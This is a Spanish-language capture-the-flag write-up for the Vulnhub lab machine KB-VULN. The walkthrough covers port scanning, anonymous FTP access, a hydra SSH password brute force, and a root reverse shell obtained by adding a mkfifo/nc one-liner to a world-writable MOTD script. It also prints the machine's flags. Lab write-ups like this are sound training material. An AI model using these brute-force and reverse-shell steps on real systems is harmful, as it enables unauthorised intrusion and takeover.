LaCashita!

[VULNHUB] KB-VULN

Hoy vamos a hackear la maquina de Vulnhub llamada KB-VULN. Podeis descargarla desde el siguiente enlace: KB-VULN

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


~ > nmap -A -p- 192.168.1.91                                                  
                                                                               
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 10:52 CEST
Nmap scan report for 192.168.1.91
Host is up (0.00064s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.59
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA)
|   256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA)
|_  256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: OneSchool — Website by Colorlib
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds

Vemos que tiene abiertos los puerto del FTP, SSH y HTTP. En el codigo fuente de la pagina web inicial podemos encontrar el siguiente comentario:


Username : sysadmin

Por otro lado, nos conectamos al ftp usando los credenciales anonymous/anonymous.


~/KB > ftp 192.168.1.91
Connected to 192.168.1.91.
220 (vsFTPd 3.0.3)
Name (192.168.1.91:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 .
drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 ..
-rw-r--r--    1 0        0              54 Aug 22 17:39 .bash_history
226 Directory send OK.

Vemos que hay un fichero .bash_history. Lo descargamos.


ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .bash_history (54 bytes).
226 Transfer complete.
54 bytes received in 0.00 secs (73.3441 kB/s)
ftp>

Echamos un vistazo al contenido del fichero...


~/KB > cat .bash_history                                                      
exit
ls
cd /etc/update-motd.d/
ls
nano 00-header
exit

Vemos que "edita" el fichero 00-header. Dicho fichero solo lo deberia poder editar root, ya que se ejecuta cada vez que alguien se loguea al sistema. Si conseguimos acceso al sistema, y podemos editar el fichero, podemos utilizarlo para elevar nuestros privilegios. Como no podemos ir por ningun otro lado, hacemos bruteforce por SSH al usuario que hemos encontrado en el comentario de la web, sysadmin.


~ > hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt 192.168.1.91 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 
10:56:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip 
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries 
(l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://192.168.1.91:22/
[22][ssh] host: 192.168.1.91   login: sysadmin   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 
10:56:54

Encontramos la password :) Nos logueamos!

Low Shell


~ > ssh sysadmin@192.168.1.91                                                 
                                                                              
sysadmin@192.168.1.91's password: 

			WELCOME TO THE KB-SERVER

Last login: Sat Aug 22 18:00:48 2020
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
sysadmin@kb-server:~$

user.txt


sysadmin@kb-server:~$ ls -la
total 40
drwxr-xr-x 5 sysadmin sysadmin 4096 Aug 22 18:04 .
drwxr-xr-x 3 root     root     4096 Aug 22 17:53 ..
-rw------- 1 sysadmin sysadmin   16 Aug 22 18:04 .bash_history
-rw-r--r-- 1 sysadmin sysadmin  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr  4  2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 22 17:02 .cache
drwxrwxr-x 2 sysadmin sysadmin 4096 Aug 22 17:39 ftp
drwx------ 3 sysadmin sysadmin 4096 Aug 22 17:02 .gnupg
-rw-r--r-- 1 sysadmin sysadmin  807 Apr  4  2018 .profile
-rw-r--r-- 1 root     root       33 Aug 22 17:54 user.txt
sysadmin@kb-server:~$ cat user.txt
48a365b4ce1e322a55ae9017f3daf0c0

Privilege Escalation

Miramos si podemos modificar el fichero 00-header como hemos visto anteriormente...


sysadmin@kb-server:~$ ls -l /etc/update-motd.d/00-header 
-rwxrwxrwx 1 root root 989 Aug 22 17:08 /etc/update-motd.d/00-header

Vemos que si :) Lo editamos para agregar una linea al final, que nos de una reverse shell a nuestra maquina con privilegios!


sysadmin@kb-server:~$ nano /etc/update-motd.d/00-header
echo "\n\t\t\tWELCOME TO THE KB-SERVER\n"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.59 8888 >/tmp/f

Ponemos nc a la escucha.


~ > nc -nlvp 8888                                                            
listening on [any] 8888 ...

Nos logueamos de nuevo con el usuario y obtemos la reverse shell...


~ > nc -nlvp 8888                                                         
listening on [any] 8888 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.91] 52826
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

root.txt


# cd /root
# ls
flag.txt
# cat flag.txt
1eedddf9fff436e6648b5e51cb0d2ec7
#

End

Y con esto ya seriamos root de la maquina.